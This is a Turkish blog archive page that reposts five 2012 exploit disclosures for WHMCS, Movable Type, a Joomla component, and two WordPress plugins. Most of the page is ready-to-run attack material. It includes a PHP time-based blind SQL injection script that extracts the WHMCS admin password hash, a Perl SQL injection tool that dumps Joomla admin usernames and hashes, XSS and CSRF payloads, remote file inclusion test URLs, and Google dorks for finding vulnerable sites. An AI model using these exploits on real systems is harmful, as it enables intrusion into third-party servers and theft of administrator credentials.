Archive for 23 Ekim 2012

admin | 23 Ekim 2012
No comments

WHMCS v4.5.2 Blind SQL Injection Vulnerability

WHMCS v4.5.2 Blind SQL Injection Açığı bulundu. Açık Hakkındaki exploit aşağıdaki şekilde. Birçok sunucuyu ilgilendiren bu açığın bir an önce kapatılması gerekir.

/ ___|| |_ __ _ _ __  __      ____ _ _ __ ___  
\___ \| __/ _` | '__| \ \ /\ / / _` | '__/ _ \ 
___) | || (_| | |     \ V  V / (_| | | |  __/ 
|____/ \__\__,_|_|      \_/\_/ \__,_|_|  \___| 
 
 
# Software : WHMCS (WHMCompleteSolution)                                              
# Google Dork: Turn on thinking mode 😛 
# Date: 10/22/2012 
# Author: Starware Security Team [www.Resecure.me] 
# Contact Us : Security[@]star-ware.com 
# Vendor Homepage: http://www.whmcs.com 
# Tested on: WHMCS v4.5.2  
# Affected versions: 4.5.x 
----------------------------------------------------- 
 
#Vulnerability Exists in : [SCRIPT_DIR]/modules/gateways/callback/googlecheckout.php 
 
#Vulnerable Source Code Snippet :  
 
LINE 11: $xml_response = (isset($HTTP_RAW_POST_DATA) ? $HTTP_RAW_POST_DATA : file_get_contents('php://input')); 
LINE 16: $xmldata = XMLtoArray($xml_response); 
LINE 19: $ordernumber = $xmldata['CHARGE-AMOUNT-NOTIFICATION']['GOOGLE-ORDER-NUMBER']; 
LINE 22: $query = 'SELECT data FROM tblgatewaylog WHERE gateway=\'Google Checkout\' AND data LIKE \'%new-order-notification%' . $ordernumber . '%\''; 
 
#Proof of Concept :  
 
<html> 
<head> 
<title>WHMCS Blind SQL Injection POC</title> 
</head> 
<body> 
<script> 
var params = "<charge-amount-notification><google-order-number>0' %YOUR INJECTION HERE% -- -</google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>"; 
var http = new XMLHttpRequest(); 
try { 
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead"); 
} catch (e) { 
alert("Permission UniversalBrowserRead denied."); 
} 
http.open("POST", "http://site.com/whmcs/modules/gateways/callback/googlecheckout.php", true); 
http.onreadystatechange = handleResponse; 
http.send(params); 
function handleResponse() { 
 
if(http.readyState == 4 && http.status == 200){ 
var response = http.responseText; 
alert(response); 
} 
}   
</script> 
</body> 
</html> 
 
#Exploit Code  :  
 
 
<?php 
/* 
WHMCS Blind SQL Injection Exploit by Starware Security Team. 
Usage: php exploit.php URL seconds 
*/
 
set_time_limit(0); 
function post_request($url,$post_data,$follow=0) { 
$user_agent = 'Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1';  
$ch = curl_init(); 
$timeout = 1; 
$execution_timeout = 4; 
curl_setopt($ch, CURLOPT_URL,$url); 
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
if($follow == 1) curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE ); 
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent); 
curl_setopt($ch, CURLOPT_HTTPHEADER,array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language: en-us,en;q=0.5','Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7','Keep-Alive: 115','Connection: keep-alive')); 
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); 
curl_setopt($ch, CURLOPT_TIMEOUT, $execution_timeout);                                                      
curl_setopt($ch, CURLOPT_POST, 1); 
curl_setopt($ch, CURLOPT_POSTFIELDS,$post_data); 
$response = curl_exec($ch); 
curl_close($ch); 
return $response; 
} 
 
function start_time() { 
$time = microtime(); 
$time = explode(" ", $time); 
$time = $time[1] + $time[0]; 
return $time; 
 
} 
 
function end_time($start) { 
$time = microtime(); 
$time = explode(" ", $time); 
$time = $time[1] + $time[0]; 
$finish = $time; 
$totaltime = ($finish - $start); 
return round($totaltime); 
} 
 
 
function check_ascii($num,$num2,$num3) { 
global $url,$seconds; 
$start= start_time();  
$injection = "/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/BETWEEN/**/$num/**/and/**/$num2,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #"; 
post_request($url,"<charge-amount-notification><google-order-number>0' $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>"); 
if(end_time($start) >= $seconds)  return true;  else return false; 
 
} 
 
 
function inject($num,$num2,$num3) { 
 
global $url,$seconds; 
for($i=$num;$i<=$num2;$i++) { 
$start= start_time();  
$injection = "/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/=/**/$i,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #"; 
post_request($url,"<charge-amount-notification><google-order-number>0' $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>"); 
if(end_time($start) >= $seconds) { echo  chr($i); flush(); } 
 
} 
 
 
} 
 
function get_password() { 
global $url; 
for($i=1; $i<=32;$i++) { 
if(check_ascii(48,52,$i))  { inject(48,52,$i); } 
elseif(check_ascii(53,57,$i)) { inject(53,57,$i); } 
elseif(check_ascii(97,101,$i)) { inject(97,101,$i); } 
elseif(check_ascii(102,106,$i)) { inject(102,106,$i); } 
elseif(check_ascii(107,111,$i)) { inject(107,111,$i); } 
elseif(check_ascii(112,116,$i)) { inject(112,116,$i); } 
elseif(check_ascii(116,122,$i)) { inject(116,122,$i); } 
} 
} 
 
 
 
if ($argc < 3) { 
print "Usage: php ".$argv[0]." URL seconds\r\nExample:\r\nphp ".$argv[0]." http://site.com/whmcs/ 1\r\n-----------------------------------------\r\n";  
die;  
} 
$url = trim($argv[1])."/modules/gateways/callback/googlecheckout.php"; 
$seconds = trim($argv[2]); 
echo "[~] Fetching password right now ... \n"; flush(); 
echo "    >> MD5 Password = "; flush(); 
get_password(); 
 
?> 
 
 
################################################################################# 
 
Note: to exploit this vulnerability the google checkout payment gateway  
should be activated by admin from the whmcs admin panel  
 
~ END OF Disclosure ~ 
 
Good Luck :) 
 
################################################################################# 
#   Starware is an company specialzed in Hosting and Information Security field # 
#   with list of high ranked sites including Mobile operators used our Hosting  # 
#                              and Security Services.                           # 
#                                                                               # 
#                            "Company Located in Egypt"                         #                         
#                                                                               #                          
#                             http://www.star-ware.com                          #       
#                                                                               # 
#################################################################################
Category: Genel | Tags: ,
admin | 23 Ekim 2012
No comments

Movable Type Pro 5.13en Stored XSS Vulnerability

Movable Type Pro 5.13en Stored XSS Açığı bulunmuş olup, açık akkında açıklamalar şu şekilde

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Source URL: http://www.cloudscan.me/2012/10/cve-2012-1503-movable-type-pro-513en.html

Keywords: CVE-2012-1503, Movable Type Pro 5.13en, Stored XSS,
JavaScript Injection, Vendor Unresponsive, Full Disclosure

Introduction

Movable Type (MT) started as one of the industries first blogging platforms
and has developed into an industry leading publishing platform which has
been used globally for more than 10 years. Movable Type makes it simple to
manage entire websites, start new blogs, and build an engaged community of
readers and customers.

Six Apart KK has assumed responsibility over all intellectual property and
business operations of Movable Type, as well as trademark rights of Six
Apart. The new Six Apart, a Japanese corporation formerly known as Six
Apart KK, currently develops, markets and supports Movable Type for a
global user base, and also operates the company's website
(www.sixapart.com). The application can be downloaded from URL
http://www.movabletype.com/download/.

Exploit

Our researchers discovered a persistent XSS vulnerability, allowing an
attacker to inject arbitrary script code into the comment section of any
existing Mt5.13en installation. The blog comment is being moderated before
published; that means an attacker can target the moderating Admin
(employee) via Javascript Injection.

Exploit Code:

<a href=javascript:alert(document.cookie)>
X X X X X X X X X X X X X X X<br>
X X X X X X X X X X X X X X X<br>
X X X X CLICKME NOW!  X X X X<br>
X X X X X X X X X X X X X X X<br>
X X X X X X X X X X X X X X X</a>

Screenshot at URL
http://www.cloudscan.me/2012/10/cve-2012-1503-movable-type-pro-513en.html

Bug Metrics: CVSS 6.5

Timeline

March 2012 - Email PoC to Vendor via 
April 2012 - No Response from Vendor
May 2012 - Email PoC to Vendor via 
October 2012 - Full Disclosure

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 2599)
Charset: utf-8

wsBVAwUBUIFqUXz+WcLIygj0AQhJ4Af8DaKXqSTGW30YeoLXeq0kUhqXQ0BicpW8
UZGCMMnlgct7DVh36GIxWc/60WXtuA8nuPqSm7eMKbIrMsvQXPhg9o8MB0LErh49
e7DY1rZ5hVpq1jVqEEQIyu2bxqS8epFR9/5CSUukGnTwaf4gTna8ZB5UZoRPhLI9
ih/OKS1L1WZeykUqZB6oSjkc4t3AeS6iYdXZMvkSrwSgnN6iUKBa3lSSzuEzEmfv
Qhuvb0R6YxNMQafHOr4IlNa/A2rgGBlhYB3P5/wXdAmcnjIhPC4qtH6ik52+NiKQ
3m5Jr3V2rXVhJRrRwj0ubC4PtfVjIC1YP/k4zY0gA7DOmHhZKk+7Iw==
=JXEo
-----END PGP SIGNATURE-----
Category: Genel | Tags:
admin | 23 Ekim 2012
No comments

Joomla Commedia Plugin SQL Injection

Joomla Commedia Plugin com_commedia (index.php, task parameter) SQL Injection açığı bulunmuş oyup, açığa ilişkin exploit aşağıdadır. Exploitle tablolaları ulaşılarak, username, password bilgileri çekilebilmekte, aktivasyon kodu istenerek admin paneline ulaşılabilmektedir.

 Exploit Title: Joomla commedia Remote Exploit

 dork: inurl:index.php?option=com_commedia
 
 Date: [18-10-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: 
  
 Vendor: http://www.ecolora.org/
 
 Version: 3.1 (last update on Oct 7, 2012) and lowers
 
 License: Commercial and Non-Commercial, affects 2 versions

 Demo: http://www.ecolora.org/index.php/demo/commedia

 Download: http://ecolora.com/index.php/programmy/file/5-plagin-mp3browser-dlya-muzykalnykh-satov-na-joomla-15
  
 Tested on: [Linux(bt5)-Windows(7ultimate)]

 Especial greetz:  Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


Descripcion: 

Commedia - a component and content plugin that allows you to create a content table containing all of the MP3's that are present in any directory of your site, a FTP-server (folder, single path to ftp-file) or a HTTP(S)-server (DROPBOX, folder, single path to http-file or http-radio).
 

Exploit: 

#!/usr/bin/perl -w
    ########################################
    # Joomla Component (commedia) Remote SQL Exploit
    #----------------------------------------------------------------------------#
    ########################################
    print "\t\t\n\n";
print "\t\n";
print "\t            Daniel Barragan  D4NB4R                \n";
print "\t                                                   \n";
print "\t      Joomla com_commedia Remote Sql Exploit \n";
print "\t\n\n";
print "                   :::Opciones de prefijo tabla users:::\n\n";
print "    1.  jos_users  2.  jml_users  3.  muc_users  4.  sgj_users  \n\n\n";

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

print ":::Opcion::: ";
my $option=<STDIN>;
if ($option==1){&jos_users}
if ($option==2){&jml_users}
if ($option==3){&muc_users}
if ($option==4){&sgj_users}


sub jos_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="jos_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub jml_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="jml_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub muc_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="muc_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub sgj_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="sgj_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

  
_____________________________________________________
Daniel Barragan "D4NB4R" 2012
Category: Genel | Tags: , , ,
admin | 23 Ekim 2012
No comments

White Label CMS v 1.5 CSRF w/ persistent XSS

White Label CMS v 1.5 CSRF w/ persistent XSS açıkları bulunmuş oyup, açıkla ilgili oluşum yerleri ve kullanımı şu şekilde;

# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS
# Date: 21/10/2012
# Exploit Author: pcsjj
# Vendor Homepage: http://www.videousermanuals.com/white-label-cms/
# Version: 1.5
# Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/
# Downloads: 110,313
# CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)

<html>
<title>Download</title>
<body>
<img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name="><script>alert("fun")</script><div
"'>
</body>
</html>
Category: Genel | Tags: ,
admin | 23 Ekim 2012
No comments

WordPress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities

WordPress Social Discussions Plugin 6.1.1 eklentisinde Remote File include ve sql injection açıkları bulundu

[waraxe-2012-SA#093] - Multiple Vulnerabilities in WordPress Social Discussions Plugin
======================================================================================

Author: Janek Vind "waraxe"
Date: 17. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-93.html


Description of vulnerable target:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Enables Social Sharing of your blog posts to 30+ Social Networks. Plugin also
enables you to Automatically Publish or Self Publish your Blog Posts to 25+ 
Networks.

http://wordpress.org/extend/plugins/social-discussions/

Affected version: 6.1.1

###############################################################################
1. Remote File Inclusion in "social-discussions-networkpub_ajax.php"
###############################################################################

Reasons: Uninitialized variable "$HTTP_ENV_VARS"
Attack vectors: User-supplied parameter "HTTP_ENV_VARS"
Preconditions:
 1. register_globals=on
 2. register_long_arrays=off
 3. allow_url_include=on for RFI if PHP >= 5.2.0
 4. PHP must be < 5.3.4 for LFI null-byte attacks
 5. magic_quotes_gpc=off for LFI null-byte attacks
 
 
Php script "social-discussions-networkpub_ajax.php" line 2:
------------------------[ source code start ]----------------------------------
if (!function_exists('add_action')){
  ($GLOBALS['HTTP_ENV_VARS']['DOCUMENT_ROOT'] . "/wp-config.php");
------------------------[ source code end ]------------------------------------

We can see, that script expects old-style array "HTTP_ENV_VARS" to be initialized
and containing "DOCUMENT_ROOT" entry. But it appears, that if PHP directive
"register_long_arrays=off", then "HTTP_ENV_VARS" is uninitialized and if in
same time "register_globals=on", it is possible to fill that array with any
value, leading to the RFI (Remote File Inclusion) vulnerability.


Tests:

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=http://php.net/?

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=/proc/self/environ%00z


###############################################################################
2. Full Path Disclosure in multiple scripts
###############################################################################

Reasons: Direct request to php script triggers pathname leak in error message
Preconditions: PHP directive display_errors=on
Result: Information Exposure Through an Error Message

Tests:

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub.php

Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions.php

Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2

http://localhost/wp342/wp-content/plugins/social-discussions/social_discussions_service_names.php

Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social_discussions_service_names.php on line 3



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------
Category: Genel | Tags: , ,
« Older Entries   Recent Entries »